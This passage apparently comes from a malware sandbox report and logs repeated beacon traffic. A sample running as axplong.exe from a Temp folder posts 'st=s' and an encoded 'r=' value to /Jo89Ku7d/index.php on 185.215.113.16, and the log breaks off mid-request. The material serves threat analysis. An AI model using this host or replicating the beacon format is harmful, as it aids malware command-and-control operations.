                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:11.066420078 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.656632185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:11.184969902 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:11.914814949 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:11.915779114 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:12.147262096 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.656633185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:12.260907888 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:12.969038010 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:12.970021963 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:13.196770906 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.656634185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:13.307682991 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:14.036765099 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:14.037873983 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:14.272277117 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.656635185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:14.385904074 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:15.076287985 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:15.077049971 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:15.300765991 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.656636185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:15.421773911 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:16.111293077 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:16.114751101 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:16.337707996 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.656637185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:16.448446989 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:17.138154984 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:17.139090061 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:17.362603903 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.656638185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:17.481440067 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:18.191874027 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:18.193197012 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:18.419306040 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.656639185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:18.528597116 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:19.222018957 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:19.222898960 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:19.446369886 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.656640185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:19.560893059 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:20.274652958 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:20.282001019 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:20.510822058 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.656642185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:20.620178938 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:21.349457026 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:21.350250959 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:21.579701900 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.656644185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:21.698478937 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:22.420396090 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:22.421452045 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:22.650329113 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.656645185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:22.761904001 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:23.454515934 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:23.455425024 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
